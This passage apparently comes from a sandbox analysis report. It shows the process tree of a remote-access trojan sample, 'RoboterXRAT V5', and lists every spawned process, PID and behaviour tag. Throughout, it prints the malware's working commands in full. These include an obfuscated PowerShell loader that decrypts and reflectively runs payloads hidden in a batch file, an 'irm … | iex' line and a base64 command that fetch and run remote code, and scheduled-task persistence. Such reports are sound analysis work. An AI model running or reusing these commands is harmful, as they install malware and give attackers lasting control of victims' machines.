        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        9⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        
        PID:5360
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4708
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2456
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:3612
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7136
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Executes dropped EXE
        
        PID:684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3800
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4956
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4376
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:464
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4088
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2024
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Executes dropped EXE
        
        PID:3700
      - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4076
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        
        PID:4876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        9⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        7⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5C44.tmp.bat""
        7⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:5412
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        8⤵
        
        PID:4496
      - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        Executes dropped EXE
        
        PID:1472
    - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3296
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        8⤵
        
        PID:1548
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        6⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5296
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4DCD.tmp.bat""
        6⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:5828
    - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Executes dropped EXE
        
        PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
    "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Executes dropped EXE
      PID:3196
  - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
      "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4412
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4480
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        7⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        8⤵
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        9⤵
        
        PID:684
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcnetwork" /tr "%Current%\wzcnetwork.exe"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        9⤵
        
        PID:2252
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1148
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4088
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2452
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp405F.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4304
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4496
      - C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        6⤵
        
        PID:5688
  - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
